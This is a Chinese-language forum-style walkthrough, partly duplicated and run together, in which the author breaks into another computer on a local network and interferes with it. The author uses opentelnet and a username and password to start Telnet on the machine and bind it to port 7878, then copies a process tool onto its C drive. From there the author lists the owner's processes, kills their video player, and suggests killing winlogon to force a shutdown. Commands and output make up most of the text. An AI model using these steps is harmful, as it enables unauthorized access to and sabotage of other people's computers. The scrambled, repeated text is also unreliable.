\\192.168.0.59 使用者名稱 密碼 1 7878看下邊成功了!BINGLE!!!Yeah!!Telnet Port is 7878. You can try:"telnet ip 7878", to connect the server!Disconnecting server...Successfully!進入DOS方式下輸入: telnet 192.168.0.59 7878 出現歡迎螢幕:*===============================================================歡迎使用 Microsoft Telnet 伺服器。*===============================================================C:\>***然後把程序檢視和結束工具複製到對方C盤copy \\192.168.0.67\c$\
aproman.exe
c:已複製 1 個檔案。執行APROMA。EXE出現用法:C:\>
aproman.exeAProMan
v1.2 - Process ManagerCopyright (C) 2000-2003 by Antiy Labshttp://www.antiy.netUsage: -a : Show All Processes. -p : Processes to Ports Mapper. ( Administrator privilege needed ) -t [PID] : Terminate process. -f [FileName] : Save all processes and modules infomation to file好,現在來檢視對方程序c:>
我剛才就在整,有人在看黃片,我拿我我的終極武器,opentelnet和程序結束工具aproman上場了。 ***先進DOS,opentelnet 遠端啟動目標主機的Telnet服務,並繫結埠到7878,見下:
opentelnet.exe
\\192.168.0.59 使用者名稱 密碼 1 7878看下邊成功了!BINGLE!!!Yeah!!Telnet Port is 7878. You can try:"telnet ip 7878", to connect the server!Disconnecting server...Successfully!進入DOS方式下輸入: telnet 192.168.0.59 7878 出現歡迎螢幕:*===============================================================歡迎使用 Microsoft Telnet 伺服器。*===============================================================C:\>***然後把程序檢視和結束工具複製到對方C盤copy \\192.168.0.67\c$\aproman.exe
c:已複製 1 個檔案。執行APROMA。EXE出現用法:C:\>aproman.exeAProMan
v1.2 - Process ManagerCopyright (C) 2000-2003 by Antiy Labshttp://www.antiy.netUsage: -a : Show All Processes. -p : Processes to Ports Mapper. ( Administrator privilege needed ) -t [PID] : Terminate process. -f [FileName] : Save all processes and modules infomation to file好,現在來檢視對方程序c:>aproman.exe
-a 看出來了:176 \??\C:\WINNT\system32\winlogon.exe228 C:\WINNT\system32\services.exe240 C:\WINNT\system32\lsass.exe416 C:\WINNT\system32\svchost.exe440 C:\WINNT\system32\spoolsv.exe472 C:\WINNT\system32\svchost.exe568 C:\WINNT\system32\MSTask.exe524 C:\WINNT\system32\stisvc.exe696 C:\WINNT\System32\WBEM\WinMgmt.exe1488 C:\WINNT\system32\regsvc.exe1072 C:\WINNT\system32\tlntsvr.exe1492 C:\WINNT\system32\tlntsess.exe1500 C:\WINNT\system32\cmd.exe1224 C:\WINNT\system32\userinit.exe1664 C:\WINNT\Explorer.EXE1612 C:\WINNT\system32\Rundll32.exe1360 C:\WINNT\system32\Clsmn.exe844 C:\Program Files\Thunder Network\Thunder\ThunderShell.exe1952 C:\Program Files\Common Files\Real\Update_OB\realsched.exe1436 C:\WINNT\system32\internat.exe1372 C:\Program Files\Tencent\QQ\QQ.exe1432 C:\Program Files\Tencent\QQ\TIMPlatform.exe1312 C:\AProMan.exe265 C:\Program Files\pp\pp.exe
C:\>看到了嗎?在用PP看黃片。好我們結束程序PP。C:\>aproman.exe
-t 265出現:AProMan v1.2 - Process ManagerCopyright (C) 2000-2003 by Antiy Labshttp://www.antiy.net(PID: 1380 )Process terminated succeed!成功了。當然,也可以關機,結束對方程序 ID176 就可以了176 \??\C:\WINNT\system32\winlogon.exe